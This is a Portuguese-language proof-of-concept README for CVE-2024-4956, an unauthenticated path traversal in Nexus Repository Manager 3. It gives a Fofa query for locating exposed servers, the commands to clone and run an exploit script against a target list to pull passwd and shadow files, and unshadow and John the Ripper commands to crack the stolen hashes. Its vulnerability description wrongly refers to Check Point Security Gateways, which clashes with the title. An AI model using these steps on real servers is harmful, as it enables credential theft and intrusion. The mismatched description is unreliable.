
POC - CVE-2024–4956 - Nexus Repository Manager 3 Path Traversal não Autenticado
Potencialmente permitindo que um atacante leia certas informações nos Check Point Security Gateways uma vez conectado à internet e com o Remote Access VPN ou Mobile Access Software Blades habilitado. Uma correção de segurança que mitiga esta vulnerabilidade está disponível.
Leia sobre isso — CVE-2024-4956
Aviso: Esta Prova de Conceito (POC) é feita apenas para fins educacionais e de teste ético. O uso desta ferramenta para atacar alvos sem consentimento mútuo prévio é ilegal. É responsabilidade do usuário final obedecer a todas as leis aplicáveis, locais, estaduais e federais. Os desenvolvedores não assumem nenhuma responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.
Para encontrar possíveis alvos, use o Fofa (similar ao Shodan.io):
header="Server: Nexus/3.53.0-01 (OSS)"
Primeiro, clone o repositório:
git clone https://github.com/verylazytech/CVE-2024-4956
Em seguida, escolha seu alvo e adicione-o ao arquivo list.txt neste formato:
Execute o Exploit:
python3 CVE-2024-4956.py -l list.txt
A saída são os arquivos passwd e shadow que foram encontrados:

Agora, depois de encontrar ambos os arquivos passwd & shadow, você pode tentar quebrar o hash com o JohnTheRipper. Após executar o exploit, você tem 2 arquivos, passwd & shadow, então pode mesclá-los em um único arquivo e tentar quebrá-los (usei rockyou.txt, mas pode ser qualquer wordlist de senhas):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt